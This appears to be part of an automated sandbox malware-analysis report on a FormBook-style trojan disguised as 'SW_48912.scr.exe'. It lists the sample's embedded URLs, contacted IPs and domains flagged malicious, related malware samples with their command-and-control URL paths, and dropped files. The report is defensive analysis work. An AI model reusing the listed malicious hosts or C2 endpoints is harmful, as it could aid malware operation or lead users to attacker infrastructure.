                                                                          http://www.galapagosdesign.com/DPleaseSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fonts.comSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.sandoll.co.krSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.urwpp.deDPleaseSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.zhongyicts.com.cnSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSW_48912.scr.exe, 00000000.00000002.1920984218.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sakkal.comSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp, SW_48912.scr.exe, 00000000.00000002.1929676185.0000000004F74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.letsbookcruise.xyzkygSlzwdnMXWUy.exe, 0000000B.00000002.3540931534.000000000549D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.apache.org/licenses/LICENSE-2.0SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.fontbureau.comSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesdchange.exe, 0000000A.00000002.3539997755.0000000005B72000.00000004.10000000.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003EF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.ecosia.org/newtab/sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exefalse
                                                                                                  		high
                                                                                                  http://www.carterandcone.comlSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://ac.ecosia.org/autocomplete?q=sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.founder.com.cn/cnSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.fontbureau.com/designers/frere-user.htmlSW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.jiyu-kobo.co.jp/SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.fontbureau.com/designers8SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  104.21.10.26
                                                                                                                  		www.bgezakofe.shopUnited States
                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                  45.41.206.57
                                                                                                                  		techstarllc.cloudReserved
                                                                                                                  		22400WEB2OBJECTSUStrue
                                                                                                                  47.83.1.90
                                                                                                                  		www.cruycq.infoUnited States
                                                                                                                  		3209VODANETInternationalIP-BackboneofVodafoneDEtrue
                                                                                                                  199.59.243.227
                                                                                                                  		94950.bodis.comUnited States
                                                                                                                  		395082BODIS-NJUSfalse
                                                                                                                  85.159.66.93
                                                                                                                  		natroredirect.natrocdn.comTurkey
                                                                                                                  		34619CIZGITRfalse
                                                                                                                  162.0.236.169
                                                                                                                  		www.primetream.liveCanada
                                                                                                                  		22612NAMECHEAP-NETUStrue
                                                                                                                  104.21.80.1
                                                                                                                  		www.dejikenkyu.cyouUnited States
                                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                                  General Information

                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1580361
                                                                                                                  Start date and time:2024-12-24 11:34:20 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 9m 45s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Run name:Run with higher sleep bypass
                                                                                                                  Number of analysed new started processes analysed:12
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:2
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:SW_48912.scr.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@11/7@11/7
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 75%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 89%
                                                                                                                  • Number of executed functions: 150
                                                                                                                  • Number of non-executed functions: 283
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.175.87.197, 13.107.246.63, 20.12.23.50
                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • VT rate limit hit for: SW_48912.scr.exe

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  No simulations

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  104.21.10.26wa71myDkbQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                    47.83.1.90z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.gayhxi.info/jfb9/
                                                                                                                    199.59.243.227rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.sob.rip/w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0
                                                                                                                    https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                                                                    • ww25.crewmak.ru/_tr
                                                                                                                    htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • ww7.cutit.org/oxgBR?usid=27&utid=9975975645
                                                                                                                    DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.969-usedcar02.shop/cfcv/
                                                                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.sorket.tech/ul4e/
                                                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • survey-smiles.com/
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • ww7.przvgke.biz/aikqer?usid=23&utid=8062768193
                                                                                                                    Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.deadshoy.tech/0sq9/
                                                                                                                    new.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.vavada-official.buzz/emhd/
                                                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.sob.rip/tp8k/
                                                                                                                    85.159.66.93DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.magmadokum.com/fo8o/
                                                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.magmadokum.com/fo8o/
                                                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.magmadokum.com/fo8o/
                                                                                                                    Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.restobarbebek.xyz/jm9b/
                                                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.magmadokum.com/fo8o/
                                                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.magmadokum.com/fo8o/
                                                                                                                    rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.beythome.online/80gy/
                                                                                                                    SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.beythome.online/nlsy/
                                                                                                                    ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.soainsaat.xyz/912o/
                                                                                                                    PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.soainsaat.xyz/rum2/

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    94950.bodis.comrQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    new.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Purchase order MIPO2425110032.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    PI916810.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    natroredirect.natrocdn.comDHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    new.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 85.159.66.93
                                                                                                                    www.sorket.techz1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    www.cruycq.infoACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 47.83.1.90

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CLOUDFLARENETUScMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                    • 104.21.67.146
                                                                                                                    Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.36.201
                                                                                                                    bG89JAQXz2.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.36.201
                                                                                                                    SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.36.201
                                                                                                                    https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 162.159.128.70
                                                                                                                    https://office356quilter.krkonqghz.ru/Vt2VD2f3#https://outlookofficecom/mail/deleteditems/id/AAQkADU5#aGVpZGkuZGlsa0BxdWlsdGVyLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                    • 104.21.17.63
                                                                                                                    http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                    • 172.67.207.202
                                                                                                                    eCompleted_419z.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 172.67.157.254
                                                                                                                    WEB2OBJECTSUSnklmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.147.192.186
                                                                                                                    8gJ5wLVFMQ.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 104.194.198.227
                                                                                                                    SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                                                    • 45.41.204.204
                                                                                                                    h7x9LMic6K.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                    • 142.147.192.152
                                                                                                                    Z3eha282zf.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                    • 142.147.232.237
                                                                                                                    https://clck.ru/36iBPHGet hashmaliciousUnknownBrowse
                                                                                                                    • 45.41.205.104
                                                                                                                    https://www.coatsgolds.com/871rc5m/21748tpd?sub1=177772&sub2=14437210-6546&sub3=8676Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.41.205.104
                                                                                                                    ax4BSyUKd4.exeGet hashmaliciousAveMariaBrowse
                                                                                                                    • 45.41.205.55
                                                                                                                    YPvUj6ZtWG.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 142.147.201.173
                                                                                                                    kzDFNFn9W1.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 142.147.192.145
                                                                                                                    VODANETInternationalIP-BackboneofVodafoneDEarmv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 84.63.234.98
                                                                                                                    nklarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 178.6.64.7
                                                                                                                    nklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 47.81.36.206
                                                                                                                    splmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 146.60.50.216
                                                                                                                    nabppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 47.66.112.158
                                                                                                                    nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 109.42.2.208
                                                                                                                    nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 92.210.45.211
                                                                                                                    sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 80.226.19.235
                                                                                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 77.25.21.10
                                                                                                                    loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 94.217.14.129
                                                                                                                    BODIS-NJUSrQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                                                                    • 199.59.243.205
                                                                                                                    Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Tbconsulting Company Guidelines Employee Handbook.docxGet hashmaliciousUnknownBrowse
                                                                                                                    • 199.59.243.205
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    new.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SW_48912.scr.exe.log

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\SW_48912.scr.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1216
                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                    Malicious:true
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2232
                                                                                                                    Entropy (8bit):5.3743124400426145
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:LWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZSUyus:LLHyIFKL3IZ2KRH9OugEs
                                                                                                                    MD5:6F95BA509ADB3DBC601C4AFAE6396773
                                                                                                                    SHA1:A5CED5AC0B29CF866ECF5B8AB1B8F1EEB28D65BB
                                                                                                                    SHA-256:78B871F91DA23C8C405E7B3EEC7B3EBEE77D71319FB82C03BEA51418CC53AFB3
                                                                                                                    SHA-512:664322690898F8809635732762D158FB8AA64A156762E5A996F3462A2E0CE06759562BE02B277FC0774BF2253A046B266FDA9811B8629E6B015C3FAAFEB2278F
                                                                                                                    Malicious:false
                                                                                                                    Preview:@...e...................................7.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4prccops.liu.ps1

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_br0ujbvr.zeo.ps1

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgujnone.003.psm1

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kc0b1i10.cna.psm1

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\u235K44

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\sdchange.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
